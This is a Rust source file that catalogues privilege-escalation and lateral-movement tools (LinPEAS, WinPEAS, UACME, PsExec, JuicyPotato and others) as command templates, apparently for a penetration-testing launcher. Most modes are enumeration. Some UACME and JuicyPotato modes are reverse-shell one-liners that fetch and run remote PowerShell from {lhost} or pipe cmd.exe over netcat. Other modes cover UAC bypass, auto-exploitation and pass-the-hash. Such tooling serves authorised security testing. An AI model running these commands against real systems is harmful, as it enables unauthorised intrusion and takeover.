use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "LinPEAS",
        binary: "/opt/tsec/tools/linpeas.sh",
        description: "The definitive Linux privilege escalation automation script.",
        modes: &[
            Mode {
                name: "Standard Run",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Scan",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -a > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Password Supply",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -P '{password}' > {output_file}"#,
                inputs: &[InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Network Enum",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -N > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Password Search",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -q > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Container Check",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -c > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SUID Focus",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh | grep -i 'suid' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Writable Files",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh | grep -i 'writable' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Cron Jobs",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh | grep -i 'cron' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Maximum Enum",
                cmd_template: r#"/opt/tsec/tools/linpeas.sh -a -N -P '{password}' > {output_file}"#,
                inputs: &[InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "WinPEAS",
        binary: "winPEASany.exe",
        description: "Windows privilege escalation enumeration — the PEASS-ng counterpart.",
        modes: &[
            Mode {
                name: "Standard Scan",
                cmd_template: r#"winPEASany.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Scan",
                cmd_template: r#"winPEASany.exe all > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Fast Scan",
                cmd_template: r#"winPEASany.exe fast > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Domain Joined",
                cmd_template: r#"winPEASany.exe domain > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Services Check",
                cmd_template: r#"winPEASany.exe | findstr /i 'service' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Registry Check",
                cmd_template: r#"winPEASany.exe | findstr /i 'registry' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Scheduled Tasks",
                cmd_template: r#"winPEASany.exe | findstr /i 'schedule' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Analysis",
                cmd_template: r#"winPEASany.exe | findstr /i 'token' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AutoLogon",
                cmd_template: r#"winPEASany.exe | findstr /i 'autologon' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Comprehensive",
                cmd_template: r#"winPEASany.exe all quiet > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "GTFONow",
        binary: "gtfonow",
        description: "Automated GTFOBins exploitation for misconfigured sudo/SUID.",
        modes: &[
            Mode {
                name: "Full Check",
                cmd_template: r#"gtfonow -a > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Sudo Check",
                cmd_template: r#"gtfonow -s > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SUID Check",
                cmd_template: r#"gtfonow -u > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Capabilities",
                cmd_template: r#"gtfonow -c > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Auto Exploit",
                cmd_template: r#"gtfonow -a -e > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Verbose",
                cmd_template: r#"gtfonow -a -v > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Binary",
                cmd_template: r#"gtfonow -b {binary_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Binary Path", "binary_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Safe Mode",
                cmd_template: r#"gtfonow -a --safe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "JSON Output",
                cmd_template: r#"gtfonow -a -o json > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Emergency",
                cmd_template: r#"gtfonow -a -e -v > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "traitor",
        binary: "./traitor",
        description: "Automatic Linux privilege escalation exploit tool.",
        modes: &[
            Mode {
                name: "Auto Exploit",
                cmd_template: r#"./traitor -a > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Docker Check",
                cmd_template: r#"./traitor -d > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Polkit Exploit",
                cmd_template: r#"./traitor -p > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Kernel Exploit",
                cmd_template: r#"./traitor -k > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Sudo Check",
                cmd_template: r#"./traitor -s > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Verbose",
                cmd_template: r#"./traitor -a -v > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exploit Only",
                cmd_template: r#"./traitor -e {exploit_name} > {output_file}"#,
                inputs: &[InputKind::Custom("Exploit Name", "exploit_name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "No Color",
                cmd_template: r#"./traitor -a --no-color > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Timeout",
                cmd_template: r#"./traitor -a -t 120 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Assessment",
                cmd_template: r#"./traitor -a -d -p -k -s -v > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Linux Exploit Suggester 2",
        binary: "linux-exploit-suggester-2.py",
        description: "Kernel exploit suggestion tool for Linux systems.",
        modes: &[
            Mode {
                name: "Kernel Check",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {kernel_version} > {output_file}"#,
                inputs: &[InputKind::Custom("Kernel Version", "kernel_version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Current Kernel",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --uname '$(uname -r)' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Download",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --download > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Report",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --full > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Check Applicability",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --check > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "JSON Output",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --json > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Priority Filter",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --priority high > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exclude Patched",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --no-duplicates > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Source URLs",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --sources > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Assessment",
                cmd_template: r#"python3 /opt/tsec/tools/linux-exploit-suggester-2.py --kernel {version} --full --download --json > {output_file}"#,
                inputs: &[InputKind::Custom("Version", "version")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "UACME",
        binary: "akagi64.exe",
        description: "User Account Control bypass collection (70+ methods).",
        modes: &[
            Mode {
                name: "Method 33",
                cmd_template: r#"akagi64.exe 33 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Method 65",
                cmd_template: r#"akagi64.exe 65 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Method 70",
                cmd_template: r#"akagi64.exe 70 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Method 23",
                cmd_template: r#"akagi64.exe 23 > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "List Methods",
                cmd_template: r#"akagi64.exe --list > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Command",
                cmd_template: r#"akagi64.exe 33 'cmd.exe /c whoami > C:\temp\out.txt' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Verify Elevation",
                cmd_template: r#"akagi64.exe 33 'whoami /groups | findstr High' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Silent PowerShell",
                cmd_template: r#"akagi64.exe 33 'powershell.exe -enc {base64}' > {output_file}"#,
                inputs: &[InputKind::Custom("Base64", "base64")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Fileless Bypass",
                cmd_template: r#"akagi64.exe 33 'powershell -nop -w hidden -c {command}' > {output_file}"#,
                inputs: &[InputKind::Custom("Command", "command")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Reverse Shell",
                cmd_template: r#"akagi64.exe 33 'powershell -nop -c iex(iwr http://{lhost}/{script})' > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "PSExec (Sysinternals)",
        binary: "psexec.exe",
        description: "Remote command execution for SYSTEM-level access.",
        modes: &[
            Mode {
                name: "Remote Shell",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "System Shell",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Single Command",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s whoami > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Copy & Execute",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -c {local_exe} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Custom("Local Exe", "local_exe")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "User Session",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -i {session} notepad.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Session],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Local System",
                cmd_template: r#"psexec.exe -s -i cmd.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hash Auth",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {ntlm_hash} -s cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "No Profile",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -e cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Background",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -d notepad.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Remote Admin",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s -c -f {payload_exe} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Custom("Payload Exe", "payload_exe")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "JuicyPotato / RoguePotato",
        binary: "JuicyPotato.exe",
        description: "DCOM/RPC privilege escalation via token impersonation.",
        modes: &[
            Mode {
                name: "Basic Exploit",
                cmd_template: r#"JuicyPotato.exe -l 1337 -c {clsid} -p {program} -a {args} > {output_file}"#,
                inputs: &[InputKind::Custom("Clsid", "clsid"), InputKind::Custom("Program", "program"), InputKind::Custom("Args", "args")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CLSID Auto",
                cmd_template: r#"JuicyPotato.exe -l 1337 -p cmd.exe -a '/c whoami > C:\temp\out.txt' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Netcat Shell",
                cmd_template: r#"JuicyPotato.exe -l 1337 -p nc.exe -a '{lhost} {lport} -e cmd.exe' > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PowerShell",
                cmd_template: r#"JuicyPotato.exe -l 1337 -p powershell.exe -a '-enc {base64_command}' > {output_file}"#,
                inputs: &[InputKind::Custom("Base64 Command", "base64_command")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "RoguePotato",
                cmd_template: r#"RoguePotato.exe -r {lhost} -e 'cmd.exe /c whoami' -l 9999 > {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SweetPotato",
                cmd_template: r#"SweetPotato.exe -p {program} -a {args} > {output_file}"#,
                inputs: &[InputKind::Custom("Program", "program"), InputKind::Custom("Args", "args")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PrintSpoofer",
                cmd_template: r#"PrintSpoofer.exe -c 'cmd.exe /c whoami' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "GodPotato",
                cmd_template: r#"GodPotato.exe -cmd 'cmd /c whoami' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Coerced Auth",
                cmd_template: r#"juicypotato.exe -l 1337 -t \* -p {program} -c {clsid} > {output_file}"#,
                inputs: &[InputKind::Custom("Program", "program"), InputKind::Custom("Clsid", "clsid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full SYSTEM",
                cmd_template: r#"JuicyPotato.exe -l 1337 -p powershell.exe -a '-nop -w hidden -c iex(iwr http://{lhost}/shell.ps1)' > {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Watson",
        binary: "Watson.exe",
        description: "Missing KB patch enumeration for Windows privilege escalation.",
        modes: &[
            Mode {
                name: "Basic Enum",
                cmd_template: r#"Watson.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Output File",
                cmd_template: r#"Watson.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Recent CVEs",
                cmd_template: r#"Watson.exe | findstr 'CVE-2024|CVE-2025|CVE-2026' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Public Exploits",
                cmd_template: r#"Watson.exe | findstr 'Exploit: True' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "OS Version",
                cmd_template: r#"systeminfo | findstr /B /C:'OS Name' /C:'OS Version' && Watson.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WES-NG",
                cmd_template: r#"python3 /opt/tsec/tools/wes.py systeminfo.txt -e > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hotfix Check",
                cmd_template: r#"systeminfo | findstr 'Hotfix(s)' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Specific KB",
                cmd_template: r#"Watson.exe | findstr '{kb_number}' > {output_file}"#,
                inputs: &[InputKind::Custom("Kb Number", "kb_number")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "ExploitDB Pipe",
                cmd_template: r#"Watson.exe | grep 'CVE' | while read cve; do searchsploit $cve; done > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Assessment",
                cmd_template: r#"systeminfo > {output_file} && Watson.exe > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "SUDO_KILLER",
        binary: "/opt/tsec/tools/sudo_killer.sh",
        description: "Identify and exploit sudo misconfigurations on Unix-like systems.",
        modes: &[
            Mode {
                name: "Basic Scan",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -r {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CVE Check",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -e > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exploit Test",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -i > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Sudoers Analysis",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -s > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Environment Check",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -g > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Version Check",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -v > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Sudoers",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -f {sudoers_file} -c > {output_file}"#,
                inputs: &[InputKind::Custom("Sudoers File", "sudoers_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LD_PRELOAD",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -l > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Wildcard Check",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -w > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Audit",
                cmd_template: r#"/opt/tsec/tools/sudo_killer.sh -c -e -i -s -g -w -r {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
];
